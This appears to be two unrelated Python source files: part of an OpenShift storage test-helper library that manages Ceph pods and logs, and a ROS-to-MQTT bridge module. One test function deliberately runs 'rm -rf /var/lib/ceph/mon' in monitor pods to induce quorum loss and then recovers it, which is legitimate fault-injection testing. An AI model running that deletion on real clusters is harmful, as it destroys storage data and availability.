f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): type of log
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
str: Output from 'oc get logs rook-ceph-operator command
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
last_log_date_time_obj (datetime obj): type of log
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
last_log_date_time_obj (datetime obj): type of log
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
Clear crash warnings and osd removal leftovers. This function can be used for example,
after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
def mon_pods_running_on_same_node():
"""
Verifies two mons are running on same node
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
statefulset_namee (str): Name of statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get it's datetime
Returns:
datetime object: The event line datetime
"""
event_line_dt = None
regex = r"\d{4}-\d{2}-\d{2}"
if re.search(regex + "T", event_line):
dt_string = event_line[:23].replace("T", " ")
event_line_dt = datetime.datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S.%f")
elif re.search(regex, event_line):
dt_string = event_line[:26]
event_line_dt = datetime.datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S.%f")
return event_line_dt
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
bool: True if the rook ceph pod to reach the desired status. False, otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
def check_number_of_mon_pods(expected_mon_num=3):
"""
Function to check the number of monitoring pods
Returns:
bool: True if number of mon pods is 3, False otherwise
"""
mon_pod_list = pod.get_mon_pods()
if len(mon_pod_list) == expected_mon_num:
logger.info(f"Number of mons equal to {expected_mon_num}")
return True
logger.error(f"Number of Mons not equal to {expected_mon_num} {mon_pod_list}")
return False
def get_secret_names(namespace=defaults.ROOK_CLUSTER_NAMESPACE, resource_name=""):
"""
Get secrets names
Args:
namespace (str): The name of the project.
resource_name (str): The resource name to fetch.
Returns:
dict: secret names
"""
logger.info(f"Get secret names on project {namespace}")
secret_obj = ocp.OCP(kind=constants.SECRET, namespace=namespace)
secrets_objs = secret_obj.get(resource_name=resource_name)
return [secret_obj["metadata"]["name"] for secret_obj in secrets_objs["items"]]
def check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running():
"""
check rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running.
Returns:
bool: True if the rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running. False otherwise.
"""
logger.info(
"check rook-ceph-crashcollector pods running on worker nodes "
"where rook-ceph pods are running."
)
logger.info(
f"crashcollector nodes: {node.get_crashcollector_nodes()}, "
f"nodes where ocs pods running: {node.get_nodes_where_ocs_pods_running()}"
)
res = sorted(node.get_crashcollector_nodes()) == sorted(
node.get_nodes_where_ocs_pods_running()
)
if not res:
logger.warning(
"rook-ceph-crashcollector pods are not running on worker nodes "
"where rook-ceph pods are running."
)
return res
def verify_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running(timeout=90):
"""
Verify rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running.
Args:
timeout (int): time to wait for verifying
Returns:
bool: True if rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running in the given timeout. False otherwise.
"""
sample = TimeoutSampler(
timeout=timeout,
sleep=10,
func=check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running,
)
return sample.wait_for_func_status(result=True)
def induce_mon_quorum_loss():
"""
Take mon quorum out by deleting /var/lib/ceph/mon directory
so that it will start crashing and the quorum is lost
Returns:
mon_pod_obj_list (list): List of mon objects
mon_pod_running[0] (obj): A mon object which is running
ceph_mon_daemon_id (list): List of crashed ceph mon id
"""
# Get mon pods
mon_pod_obj_list = pod.get_mon_pods()
# rsh into 2 of the mon pod and delete /var/lib/ceph/mon directory
mon_pod_obj = random.sample(mon_pod_obj_list, 2)
mon_pod_running = list(set(mon_pod_obj_list) - set(mon_pod_obj))
for pod_obj in mon_pod_obj:
command = "rm -rf /var/lib/ceph/mon"
try:
pod_obj.exec_cmd_on_pod(command=command)
except CommandFailed as ef:
if "Device or resource busy" not in str(ef):
raise ef
# Get the crashed mon id
ceph_mon_daemon_id = [
pod_obj.get().get("metadata").get("labels").get("ceph_daemon_id")
for pod_obj in mon_pod_obj
]
logger.info(f"Crashed ceph mon daemon id: {ceph_mon_daemon_id}")
# Wait for sometime after the mon crashes
time.sleep(300)
# Check the operator log mon quorum lost
operator_logs = get_logs_rook_ceph_operator()
pattern = (
"op-mon: failed to check mon health. "
"failed to get mon quorum status: mon "
"quorum status failed: exit status 1"
)
logger.info(f"Check the operator log for the pattern : {pattern}")
if not re.search(pattern=pattern, string=operator_logs):
logger.error(
f"Pattern {pattern} couldn't find in operator logs. "
"Mon quorum may not have been lost after deleting "
"var/lib/ceph/mon. Please check"
)
raise UnexpectedBehaviour(
f"Pattern {pattern} not found in operator logs. "
"Maybe mon quorum not failed or mon crash failed Please check"
)
logger.info(f"Pattern found: {pattern}. Mon quorum lost")
return mon_pod_obj_list, mon_pod_running[0], ceph_mon_daemon_id
def recover_mon_quorum(mon_pod_obj_list, mon_pod_running, ceph_mon_daemon_id):
"""
Recover mon quorum back by following
procedure mentioned in https://access.redhat.com/solutions/5898541
Args:
mon_pod_obj_list (list): List of mon objects
mon_pod_running (obj): A mon object which is running
ceph_mon_daemon_id (list): List of crashed ceph mon id
"""
from ocs_ci.ocs.cluster import is_lso_cluster
# Scale down rook-ceph-operator
logger.info("Scale down rook-ceph-operator")
if not modify_deployment_replica_count(
deployment_name=constants.ROOK_CEPH_OPERATOR, replica_count=0
):
raise CommandFailed("Failed to scale down rook-ceph-operator to 0")
logger.info("Successfully scaled down rook-ceph-operator to 0")
# Take a backup of the current mon deployment which running
dep_obj = OCP(
kind=constants.DEPLOYMENT, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
if is_lso_cluster():
mon = mon_pod_running.get().get("metadata").get("labels").get("mon")
mon_deployment_name = f"rook-ceph-mon-{mon}"
else:
mon_deployment_name = (
mon_pod_running.get().get("metadata").get("labels").get("pvc_name")
)
running_mon_pod_yaml = dep_obj.get(resource_name=mon_deployment_name)
# Patch the mon Deployment to run a sleep
# instead of the ceph-mon command
logger.info(
f"Edit mon {mon_deployment_name} deployment to run a sleep instead of the ceph-mon command"
)
params = (
'{"spec": {"template": {"spec": '
'{"containers": [{"name": "mon", "command": ["sleep", "infinity"], "args": []}]}}}}'
)
dep_obj.patch(
resource_name=mon_deployment_name, params=params, format_type="strategic"
)
logger.info(
f"Deployment {mon_deployment_name} successfully set to sleep instead of the ceph-mon command"
)
# Set 'initialDelaySeconds: 2000' so that pod doesn't restart
logger.info(
f"Edit mon {mon_deployment_name} deployment to set 'initialDelaySeconds: 2000'"
)
params = (
'[{"op": "replace", '
'"path": "/spec/template/spec/containers/0/livenessProbe/initialDelaySeconds", "value":2000}]'
)
dep_obj.patch(resource_name=mon_deployment_name, params=params, format_type="json")
logger.info(
f"Deployment {mon_deployment_name} successfully set 'initialDelaySeconds: 2000'"
)
# rsh to mon pod and run commands to remove lost mons
# set a few simple variables
time.sleep(60)
mon_pod_obj = pod.get_mon_pods()
for pod_obj in mon_pod_obj:
if (
is_lso_cluster()
and pod_obj.get().get("metadata").get("labels").get("mon") == mon
):
mon_pod_running = pod_obj
elif (
pod_obj.get().get("metadata").get("labels").get("pvc_name")
== mon_deployment_name
):
mon_pod_running = pod_obj
monmap_path = "/tmp/monmap"
args_from_mon_containers = (
running_mon_pod_yaml.get("spec")
.get("template")
.get("spec")
.get("containers")[0]
.get("args")
)
# Extract the monmap to a file
logger.info("Extract the monmap to a file")
args_from_mon_containers.append(f"--extract-monmap={monmap_path}")
extract_monmap = " ".join(args_from_mon_containers).translate(
"()".maketrans("", "", "()")
)
command = f"ceph-mon {extract_monmap}"
mon_pod_running.exec_cmd_on_pod(command=command)
# Review the contents of monmap
command = f"monmaptool --print {monmap_path}"
mon_pod_running.exec_cmd_on_pod(command=command, out_yaml_format=False)
# Take a backup of current monmap
backup_of_monmap_path = "/tmp/monmap.current"
logger.info(f"Take a backup of current monmap in location {backup_of_monmap_path}")
command = f"cp {monmap_path} {backup_of_monmap_path}"
mon_pod_running.exec_cmd_on_pod(command=command, out_yaml_format=False)
# Remove the crashed mon from the monmap
logger.info("Remove the crashed mon from the monmap")
for mon_id in ceph_mon_daemon_id:
command = f"monmaptool {backup_of_monmap_path} --rm {mon_id}"
mon_pod_running.exec_cmd_on_pod(command=command, out_yaml_format=False)
logger.info("Successfully removed the crashed mon from the monmap")
# Inject the monmap back to the monitor
logger.info("Inject the new monmap back to the monitor")
args_from_mon_containers.pop()
args_from_mon_containers.append(f"--inject-monmap={backup_of_monmap_path}")
inject_monmap = " ".join(args_from_mon_containers).translate(
"()".maketrans("", "", "()")
)
command = f"ceph-mon {inject_monmap}"
mon_pod_running.exec_cmd_on_pod(command=command)
args_from_mon_containers.pop()
# Patch the mon deployment to run "mon" command again
logger.info(f"Edit mon {mon_deployment_name} deployment to run mon command again")
params = (
f'{{"spec": {{"template": {{"spec": {{"containers": '
f'[{{"name": "mon", "command": ["ceph-mon"], "args": {json.dumps(args_from_mon_containers)}}}]}}}}}}}}'
)
dep_obj.patch(resource_name=mon_deployment_name, params=params)
logger.info(
f"Deployment {mon_deployment_name} successfully set to run mon command again"
)
# Set 'initialDelaySeconds: 10' back
logger.info(
f"Edit mon {mon_deployment_name} deployment to set again 'initialDelaySeconds: 10'"
)
params = (
'[{"op": "replace", '
'"path": "/spec/template/spec/containers/0/livenessProbe/initialDelaySeconds", "value":10}]'
)
dep_obj.patch(resource_name=mon_deployment_name, params=params, format_type="json")
logger.info(
f"Deployment {mon_deployment_name} successfully set 'initialDelaySeconds: 10'"
)
# Scale up the rook-ceph-operator deployment
logger.info("Scale up rook-ceph-operator")
if not modify_deployment_replica_count(
deployment_name=constants.ROOK_CEPH_OPERATOR, replica_count=1
):
raise CommandFailed("Failed to scale up rook-ceph-operator to 1")
logger.info("Successfully scaled up rook-ceph-operator to 1")
logger.info("Validate rook-ceph-operator pod is running")
pod_obj = OCP(kind=constants.POD, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
pod_obj.wait_for_resource(
condition=constants.STATUS_RUNNING,
selector=constants.OPERATOR_LABEL,
resource_count=1,
timeout=600,
sleep=5,
)
# Verify all mons are up and running
logger.info("Validate all mons are up and running")
pod_obj.wait_for_resource(
condition=constants.STATUS_RUNNING,
selector=constants.MON_APP_LABEL,
resource_count=len(mon_pod_obj_list),
timeout=1200,
sleep=5,
)
logger.info("All mons are up and running")
def create_reclaim_space_job(
pvc_name,
reclaim_space_job_name=None,
backoff_limit=None,
retry_deadline_seconds=None,
):
"""
Create ReclaimSpaceJob to invoke reclaim space operation on RBD volume
Args:
pvc_name (str): Name of the PVC
reclaim_space_job_name (str): The name of the ReclaimSpaceJob to be created
backoff_limit (int): The number of retries before marking reclaim space operation as failed
retry_deadline_seconds (int): The duration in seconds relative to the start time that the
operation may be retried
Returns:
ocs_ci.ocs.resources.ocs.OCS: An OCS object representing ReclaimSpaceJob
"""
reclaim_space_job_name = (
reclaim_space_job_name or f"reclaimspacejob-{pvc_name}-{uuid4().hex}"
)
job_data = templating.load_yaml(constants.CSI_RBD_RECLAIM_SPACE_JOB_YAML)
job_data["metadata"]["name"] = reclaim_space_job_name
job_data["spec"]["target"]["persistentVolumeClaim"] = pvc_name
if backoff_limit:
job_data["spec"]["backOffLimit"] = backoff_limit
if retry_deadline_seconds:
job_data["spec"]["retryDeadlineSeconds"] = retry_deadline_seconds
ocs_obj = create_resource(**job_data)
return ocs_obj
def create_reclaim_space_cronjob(
pvc_name,
reclaim_space_job_name=None,
backoff_limit=None,
retry_deadline_seconds=None,
schedule="weekly",
):
"""
Create ReclaimSpaceCronJob to invoke reclaim space operation on RBD volume
Args:
pvc_name (str): Name of the PVC
reclaim_space_job_name (str): The name of the ReclaimSpaceCRonJob to be created
backoff_limit (int): The number of retries before marking reclaim space operation as failed
retry_deadline_seconds (int): The duration in seconds relative to the start time that the
operation may be retried
schedule (str): Type of schedule
Returns:
ocs_ci.ocs.resources.ocs.OCS: An OCS object representing ReclaimSpaceJob
"""
reclaim_space_cronjob_name = reclaim_space_job_name or create_unique_resource_name(
pvc_name, f"{constants.RECLAIMSPACECRONJOB}-{schedule}"
)
job_data = templating.load_yaml(constants.CSI_RBD_RECLAIM_SPACE_CRONJOB_YAML)
job_data["metadata"]["name"] = reclaim_space_cronjob_name
job_data["spec"]["jobTemplate"]["spec"]["target"][
"persistentVolumeClaim"
] = pvc_name
if backoff_limit:
job_data["spec"]["jobTemplate"]["spec"]["backOffLimit"] = backoff_limit
if retry_deadline_seconds:
job_data["spec"]["jobTemplate"]["spec"][
"retryDeadlineSeconds"
] = retry_deadline_seconds
if schedule:
job_data["spec"]["schedule"] = "@" + schedule
ocs_obj = create_resource(**job_data)
return ocs_obj
def get_cephfs_subvolumegroup():
"""
Get the name of cephfilesystemsubvolumegroup. The name should be fetched if the platform is not MS.
Returns:
str: The name of cephfilesystemsubvolumegroup
"""
if (
config.ENV_DATA.get("platform", "").lower()
in constants.MANAGED_SERVICE_PLATFORMS
and config.ENV_DATA.get("cluster_type", "").lower() == "consumer"
):
subvolume_group = ocp.OCP(
kind=constants.CEPHFILESYSTEMSUBVOLUMEGROUP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
)
subvolume_group_obj = subvolume_group.get().get("items")[0]
subvolume_group_name = subvolume_group_obj.get("metadata").get("name")
else:
subvolume_group_name = "csi"
return subvolume_group_name
|
bridge.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
import inject
import paho.mqtt.client as mqtt
import rospy
from .util import lookup_object, extract_values, populate_instance
from threading import Condition
from queue import Queue
from uuid import uuid4
from threading import Thread
def create_bridge(factory, **kwargs):
u""" bridge generator function
:param (str|class) factory: Bridge class
:param kwargs: bridge-specific arguments
:return Bridge: bridge object
"""
if isinstance(factory, basestring):
factory = lookup_object(factory)
if not issubclass(factory, Bridge):
raise ValueError("factory should be Bridge subclass")
return factory(**kwargs)
class Bridge(object):
u""" Bridge base class
:param mqtt.Client _mqtt_client: MQTT client
:param _serialize: message serialize callable
:param _deserialize: message deserialize callable
"""
__metaclass__ = ABCMeta
_mqtt_client = inject.attr(mqtt.Client)
_serialize = inject.attr('serializer')
_deserialize = inject.attr('deserializer')
_extract_private_path = inject.attr('mqtt_private_path_extractor')
class DynamicBridgeServer(Bridge):
u""" Dynamic Bridge Server that serves as the remote end to PublishBridge
and SubscribeBridge, as well as the RemoteService. Should always be instantiated if
indeed the purpose is bridging between ROS-sides.
"""
def __init__(self, control_topic="__dynamic_server"):
self._control_topic = control_topic + '/topic/#'
self._service_topic = control_topic + '/service/request/#'
self._register_service_topic = control_topic + '/service/register/#'
self._mqtt_client.subscribe(self._control_topic, qos=2)
self._mqtt_client.message_callback_add(self._control_topic, self._callback_mqtt_topic)
self._mqtt_client.subscribe(self._service_topic, qos=2)
self._mqtt_client.message_callback_add(self._service_topic, self._callback_mqtt_service)
self._mqtt_client.subscribe(self._register_service_topic, qos=2)
self._mqtt_client.message_callback_add(self._register_service_topic, self._register_service)
self._bridges = set([])
rospy.loginfo('DynamicBridgeServer started on control topic %s' % control_topic)
def _callback_mqtt_service(self, client, userdata, mqtt_msg):
t = Thread(target=self.__callback_mqtt_service, args=(userdata, mqtt_msg))
t.start()
def __callback_mqtt_service(self, userdata, mqtt_msg):
rospy.logdebug("MQTT service call received from {}".format(mqtt_msg.topic))
msg_dict = self._deserialize(mqtt_msg.payload)
service_type = lookup_object(msg_dict['type'])
request_type = lookup_object(msg_dict['type'] + 'Request')
# create request object
request = request_type()
# and populate it
populate_instance(msg_dict['args'], request)
response_type = lookup_object(msg_dict['type'] + 'Response')
# create empty response object
response = response_type()
msg_dict['op'] = 'response'
try:
rospy.logdebug('waiting for service %s' % msg_dict['service'])
rospy.wait_for_service(msg_dict['service'], 1)
service = rospy.ServiceProxy(msg_dict['service'], service_type)
response = service.call(request)
msg_dict['response'] = extract_values(response)
except Exception:
rospy.logerr("Service %s doesn't exist" % msg_dict['service'])
msg_dict['response'] = None
finally:
payload = bytearray(self._serialize(msg_dict))
self._mqtt_client.publish(
topic=msg_dict['response_topic'], payload=payload,
qos=2, retain=False)
def _register_service(self, client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
if msg_dict['op'] == 'register':
rospy.loginfo("register service proxy")
try:
self._bridges.add(RemoteService(
**msg_dict['args'])
)
except rospy.ServiceException as e:
rospy.logerr("Captured exception when trying to register a "
"service twice. This happens when mqtt clients are restarted:"
" %s" % (e,))
def _callback_mqtt_topic(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
def __bridge_exists(args):
for __bridge in self._bridges:
if __bridge._topic_from == args['topic_to'] and\
__bridge._topic_to == args['topic_from']:
return True
return False
if msg_dict['op'] == 'mqtt2ros_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward mqtt topic to ros %s" % (
msg_dict['args']))
self._bridges.add(MqttToRosBridge(
**msg_dict['args'])
)
else:
rospy.loginfo("bridge for %s already initialised" % (
msg_dict['args']))
if msg_dict['op'] == 'ros2mqtt_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward ros topic to mqtt %s" % (
msg_dict['args']))
self._bridges.add(RosToMqttBridge(
**msg_dict['args'])
)
else:
rospy.logwarn("bridge for %s already initialised" % (
msg_dict['args']))
class RosToMqttBridge(Bridge):
u""" Bridge from ROS topic to MQTT
:param str topic_from: incoming ROS topic path
:param str topic_to: outgoing MQTT topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param bool latched: retain the last message on the MQTT topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None, latched=False, qos=0):
self._topic_from = topic_from
self._topic_to = self._extract_private_path(topic_to)
self._last_published = rospy.get_time()
self._interval = 0 if frequency is None else 1.0 / frequency
self._latched = latched
self._qos = qos
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
rospy.Subscriber(topic_from, msg_type, self._callback_ros)
def _callback_ros(self, msg):
rospy.logdebug("ROS received from {}".format(self._topic_from))
now = rospy.get_time()
if now - self._last_published >= self._interval:
self._publish(msg)
self._last_published = now
def _publish(self, msg):
payload = bytearray(self._serialize(extract_values(msg)))
self._mqtt_client.publish(
topic=self._topic_to, payload=payload,
qos=self._qos, retain=self._latched)
class MqttToRosBridge(Bridge):
u""" Bridge from MQTT to ROS topic
:param str topic_from: incoming MQTT topic path
:param str topic_to: outgoing ROS topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param int queue_size: ROS publisher's queue size (default: 10)
:param bool latch: latch the ROS topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None,
queue_size=10, latched=False, qos=0):
self._topic_from = self._extract_private_path(topic_from)
self._topic_to = topic_to
if isinstance(msg_type, basestring):
msg_type = lookup_object(msg_type)
if not issubclass(msg_type, rospy.Message):
raise TypeError(
"msg_type should be rospy.Message instance or its string"
"reprensentation")
self._msg_type = msg_type
self._queue_size = queue_size
self._latched = latched
self._qos = qos
self._last_published = rospy.get_time()
self._interval = None if frequency is None else 1.0 / frequency
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(self._topic_from, qos=self._qos)
self._mqtt_client.message_callback_add(self._topic_from, self._callback_mqtt)
self._publisher = rospy.Publisher(
self._topic_to, self._msg_type, queue_size=self._queue_size, latch=self._latched)
def _callback_mqtt(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
rospy.logdebug("MQTT received from {}".format(mqtt_msg.topic))
now = rospy.get_time()
if self._interval is None or now - self._last_published >= self._interval:
try:
ros_msg = self._create_ros_message(mqtt_msg)
self._publisher.publish(ros_msg)
self._last_published = now
except Exception as e:
rospy.logerr(e)
def _create_ros_message(self, mqtt_msg):
u""" create ROS message from MQTT payload
:param mqtt.Message mqtt_msg: MQTT Message
:return rospy.Message: ROS Message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
return populate_instance(msg_dict, self._msg_type())
class SubscribeBridge(MqttToRosBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_from.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(SubscribeBridge, self).__init__(self._mqtt_topic, topic_to, msg_type, frequency, latched, qos)
rospy.loginfo('SubscribeBridge: subscribe ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'ros2mqtt_subscribe',
'args': {
'topic_from': topic_from,
'topic_to': self._mqtt_topic,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class PublishBridge(RosToMqttBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_to.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(PublishBridge, self).__init__(topic_from, self._mqtt_topic, msg_type, frequency, latched, qos)
rospy.loginfo('PublishBridge: publish from ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'mqtt2ros_subscribe',
'args': {
'topic_from': self._mqtt_topic,
'topic_to': topic_to,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class LocalServiceProxy(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._register_service_topic = control_topic + '/service/register/' + (local_server + "_TO_" + remote_server).replace('/','_')
rospy.loginfo('LocalServiceProxy: offer remote access to ROS service %s as %s via MQTT' %
(local_server, remote_server)
)
cmd = {
'op': 'register',
'args': {
'local_server': remote_server,
'remote_server': local_server,
'srv_type': srv_type,
'control_topic': control_topic
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._register_service_topic, payload=payload,
qos=2, retain=True)
class RemoteService(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._local_server = local_server
self._remote_server = remote_server
self._control_topic = control_topic
self._mqtt_topic_request = self._control_topic + '/service/request/' + (local_server + "_TO_" + remote_server).replace('/','_')
self._srv_type_name = srv_type
self._srv_type = lookup_object(self._srv_type_name)
